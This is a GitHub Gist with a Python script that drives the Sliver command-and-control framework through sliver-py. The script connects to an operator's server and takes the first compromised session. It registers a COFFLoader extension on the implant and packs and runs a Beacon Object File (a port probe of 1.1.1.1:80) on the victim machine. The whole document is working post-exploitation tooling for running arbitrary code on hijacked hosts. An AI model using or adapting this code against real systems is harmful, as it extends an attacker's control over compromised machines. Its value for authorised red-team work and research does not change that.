Created
April 28, 2023 16:15
-
-
Save zimnyaa/4b5ceb41ced9919216698fae6dd7e992 to your computer and use it in GitHub Desktop.
Runs a BOF from a sliver-py client with https://github.com/moloch--/sliver-py/pull/39/commits
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, asyncio | |
| import time | |
| import sliver | |
| from struct import pack, calcsize | |
| class BeaconPack: # thanks COFFLoader | |
| def __init__(self): | |
| self.buffer = b'' | |
| self.size = 0 | |
| def getbuffer(self): | |
| return pack("<L", self.size) + self.buffer | |
| def addshort(self, short): | |
| self.buffer += pack("<h", short) | |
| self.size += 2 | |
| def addint(self, dint): | |
| self.buffer += pack("<i", dint) | |
| self.size += 4 | |
| def addstr(self, s): | |
| if isinstance(s, str): | |
| s = s.encode("utf-8") | |
| fmt = "<L{}s".format(len(s) + 1) | |
| self.buffer += pack(fmt, len(s)+1, s) | |
| self.size += calcsize(fmt) | |
| def addWstr(self, s): | |
| if isinstance(s, str): | |
| s = s.encode("utf-16_le") | |
| fmt = "<L{}s".format(len(s) + 2) | |
| self.buffer += pack(fmt, len(s)+2, s) | |
| self.size += calcsize(fmt) | |
| async def main(): | |
| if len(sys.argv) != 2: | |
| print("usage: callbof.py <config>") | |
| exit(1) | |
| config = sliver.SliverClientConfig.parse_config_file(sys.argv[1]) | |
| client = sliver.SliverClient(config) | |
| await client.connect() | |
| sessions = await client.sessions() | |
| session = sessions[0] | |
| print(f"{session.Name}: {session.Username}@{session.Hostname}") | |
| interact = await client.interact_session(sessions[0].ID) | |
| extensions = await interact.list_extensions() | |
| print("loaded extensions:", extensions.Names) | |
| if "coff-loader" not in extensions.Names: | |
| print("registering extension coff-loader") | |
| with open("COFFLoader.x64.dll", 'rb') as f: | |
| coffloaderdata = f.read() | |
| await interact.register_extension("coff-loader", coffloaderdata, session.OS, None) | |
| with open("probe.x64.o", 'rb') as f: | |
| bofdata = f.read() | |
| bofparams = BeaconPack() | |
| bofparams.addstr("1.1.1.1") | |
| bofparams.addint(80) | |
| bofbuffer = bofparams.getbuffer() # 1.1.1.1:80 | |
| coffloader_params = BeaconPack() | |
| coffloader_params.addstr("go") | |
| coffloader_params.addstr(bofdata) | |
| coffloader_params.addstr(bofbuffer) | |
| coffloader_buffer = coffloader_params.getbuffer() | |
| call_result = await interact.call_extension("coff-loader", "LoadAndRun", coffloader_buffer) | |
| for line in call_result.Output.decode().split("\n"): | |
| print(f"BOF: {line}") | |
| if __name__ == '__main__': | |
| loop = asyncio.new_event_loop() | |
| loop.run_until_complete(main()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment